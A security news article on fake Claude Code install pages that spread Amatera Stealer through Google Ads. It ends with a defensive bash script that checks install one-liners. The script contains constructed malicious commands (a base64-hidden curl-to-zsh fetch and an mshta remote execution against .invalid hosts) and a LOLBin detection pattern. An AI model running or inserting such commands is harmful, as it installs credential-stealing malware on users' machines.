Fake Claude Code installation pages are delivering malware through Google Ads. Push Security published its findings on March 6, 2026, documenting at least 17 lookalike domains that replace the real install command with one that delivers Amatera Stealer, an infostealer targeting browser credentials, cryptocurrency wallets, and session tokens. BleepingComputer confirmed that the malicious sponsored results were still live at the time of publication.
Push Security calls the technique InstallFix. It is a variant of ClickFix (a social engineering method that tricks users into running malicious commands), but with one key difference. Traditional ClickFix attacks need a manufactured excuse to get users to paste a command, whether a fake CAPTCHA, a fabricated error, or a bogus system prompt. InstallFix needs none of that. The user genuinely wants to install software, and the fake page gives them what looks like the real install command.
The cloned pages are pixel-perfect replicas of the official Claude Code documentation: layout, Anthropic branding, sidebar navigation and working links are all reproduced. The only meaningful change is inside the install one-liner itself. Instead of fetching the script from claude.ai, the command points to attacker-controlled infrastructure. On macOS, it base64-decodes a hidden URL and pipes the fetched shell script into zsh, so the destination host never appears in plain text on the page. On Windows, cmd.exe spawns mshta.exe to execute remote content from the domain claude[.]update-version[.]com. Clicking anything else on the page redirects to the legitimate Anthropic site, reducing suspicion.
The reality is that users are going to encounter malicious links through stealthy channels like malvertising every day, just through normal internet browsing, without being actively targeted.
— Said Jacques Louw, Co-founder and CPO of Push Security
Distribution runs entirely through Google Ads. Searches for "Claude Code install," "Claude Code CLI," and similar queries return sponsored results above the organic links to Anthropic's real documentation. BleepingComputer identified claude-code-cmd.squarespace[.]com as the top result for "install claude code." Other cloned domains sit on Cloudflare Pages and Tencent EdgeOne. Search result listings typically show only the hosting platform's registrable domain rather than the attacker's subdomain, giving the lookalike sites additional cover. According to Push Security, 4 in 5 ClickFix lures they intercept reach victims through search engines, not email.
The payload is Amatera Stealer. Proofpoint first documented it on June 16, 2025, identifying it as a rebranded version of ACR Stealer (also known as AcridRain). ACR's operator, a threat actor tracked as "SheldIO," sold the source code on underground forums in July 2024. Amatera is now sold as malware-as-a-service (MaaS, a subscription model that lets criminal operators rent access to ready-made malware) with plans ranging from $199 per month to $1,499 per year.
Amatera harvests browser-saved passwords, cookies, session tokens, and cryptocurrency wallet credentials. eSentire's Threat Response Unit analyzed it in November 2025 and found it targets 149 cryptocurrency wallets and 43 password managers. It uses WoW64 SysCalls to bypass user-mode hooks in EDR (endpoint detection and response) products, NTSockets for C2 (command-and-control) communication, and hardcoded Cloudflare CDN IP addresses to disguise its traffic as legitimate.
While Amatera Stealer retains the core of its predecessor, it has undergone enough development and enhancement to stand out as a distinct and noteworthy threat.
— According to the Proofpoint Threat Research Team, June 2025.
Claude Code is not the only AI tool being impersonated. In February 2026, attackers abused Claude artifacts (public user-generated content hosted on the claude.ai domain) in ClickFix campaigns that BleepingComputer reported were viewed over 15,000 times before removal. Fake Homebrew installation pages delivered the Cuckoo infostealer in January 2026, according to Hunt.io. Fake OpenClaw installers on GitHub were boosted by Bing's AI-enhanced search results. Trojanized npm packages mimicked the official Claude Code package name. Any tool with a "copy this command" onboarding flow and a fast-growing audience is a potential target.
Amatera's rise coincides with the disruption of Lumma Stealer, previously the dominant MaaS infostealer. In May 2025, Operation Endgame seized 2,300 Lumma domains. Proofpoint noted that displaced threat actors would seek alternatives. Amatera's expanding distribution channels and subscription pricing position it as a direct replacement.
Neither Google nor Anthropic has commented publicly on the campaign as of March 9, 2026. Push Security has published a full list of indicators of compromise, including 17 cloned domains, three payload-hosting domains, and the specific malicious commands used in the attacks.
Developers searching for Claude Code should install it only from the official documentation at docs.anthropic.com. Do not click sponsored search results for CLI tool installations. Before executing any curl-to-bash command, read the full URL inside it, not just the page it appears on; if the URL is hidden behind base64 decoding, a variable, or a Windows LOLBin such as mshta.exe, that alone is reason to stop. Where practical, download the install script to a file and read it before running it. If you ran a command from a fake Claude Code page, treat all browser-stored passwords, cookies, session tokens, and crypto wallet credentials as compromised. Change them from a separate trusted device and revoke all active sessions, since a stolen session token remains valid after a password change until the session is revoked.
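The manual check above (decode anything hidden, find every host the one-liner would fetch from, refuse interpreters fed from anywhere unexpected) can be scripted. The following is an added example written for this article, not Push Security's tooling and not Anthropic's installer. It assumes that the genuine installer fetches only from claude.ai (the allowlist is an assumption), and the three sample commands are constructed: the first mirrors the legitimate form, the other two mimic the macOS base64 swap and the Windows mshta.exe swap described in the article, using a reserved .invalid domain rather than any real indicator.

```bash
#!/usr/bin/env bash
# Added example (not Push Security's tooling, not Anthropic's installer):
# vet a copied install one-liner before running it. Hidden URLs in base64
# tokens are decoded, every host the command would fetch from is listed, and
# the command is rejected if any host is off the allowlist or if it uses
# obfuscation / living-off-the-land patterns a real installer never needs.
# The allowlist and the three sample commands are assumptions for illustration.

# Hosts the genuine installer is expected to fetch from (assumption).
ALLOWED_HOSTS='claude.ai'

# Patterns worth refusing outright: base64 decoding inside an install
# command, mshta/certutil LOLBins, PowerShell encoded commands.
SUSPICIOUS_RE='base64[[:space:]]+(-d|-D|--decode)|mshta|certutil|-encodedcommand|-enc([[:space:]]|$)'

# Constructed sample commands (the base64 token decodes to a .invalid URL).
LEGIT_CMD='curl -fsSL https://claude.ai/install.sh | bash'
FAKE_MAC_CMD='curl -fsSL "$(echo aHR0cHM6Ly9leGFtcGxlLmludmFsaWQvaS5zaA== | base64 -d)" | zsh'
FAKE_WIN_CMD='cmd /c mshta https://claude.update-version.invalid/x'

# Print every host the command references, one per line, including hosts
# hidden inside base64 tokens. (GNU and current macOS base64 accept -d.)
extract_hosts() {
  local cmd="$1" blob decoded
  {
    printf '%s\n' "$cmd"
    printf '%s\n' "$cmd" | grep -aoE '[A-Za-z0-9+/]{16,}={0,2}' | while IFS= read -r blob; do
      decoded=$(printf '%s' "$blob" | base64 -d 2>/dev/null | tr -d '\0') || true
      printf '%s\n' "$decoded"
    done
  } | grep -aoE 'https?://[^/[:space:]"|)]+' | sed -E 's#^https?://##' | sort -u
}

# Return 0 if the command fetches only from allowlisted hosts and contains no
# suspicious pattern; otherwise print each finding to stderr and return 1.
check_install_cmd() {
  local cmd="$1" host rc=0 nhosts=0 piped=0
  if printf '%s' "$cmd" | grep -qiE "$SUSPICIOUS_RE"; then
    echo "FLAG: obfuscation or LOLBin pattern in command" >&2
    rc=1
  fi
  # Does the command pipe fetched content straight into an interpreter?
  printf '%s' "$cmd" | grep -qE '\|[[:space:]]*(ba|z|da)?sh([[:space:]]|$)' && piped=1
  while IFS= read -r host; do
    [ -n "$host" ] || continue
    nhosts=$((nhosts + 1))
    case " $ALLOWED_HOSTS " in
      *" $host "*) ;;
      *) echo "FLAG: fetches from unexpected host '$host'" >&2; rc=1 ;;
    esac
  done <<EOF
$(extract_hosts "$cmd")
EOF
  if [ "$piped" -eq 1 ] && [ "$nhosts" -eq 0 ]; then
    echo "FLAG: pipes into a shell but the source URL cannot be determined" >&2
    rc=1
  fi
  return "$rc"
}

# Demo over the constructed samples: the first passes, the other two are denied.
for c in "$LEGIT_CMD" "$FAKE_MAC_CMD" "$FAKE_WIN_CMD"; do
  if check_install_cmd "$c"; then echo "OK:   $c"; else echo "DENY: $c"; fi
done
```

The allowlist check, not the pattern list, is the part that matters: a lookalike that simply used a plain URL on an attacker domain would pass every pattern test and still be denied because the host is not one the installer is expected to use. Run the function on the command you are about to paste, and treat any FLAG line as a reason to go to the official documentation instead.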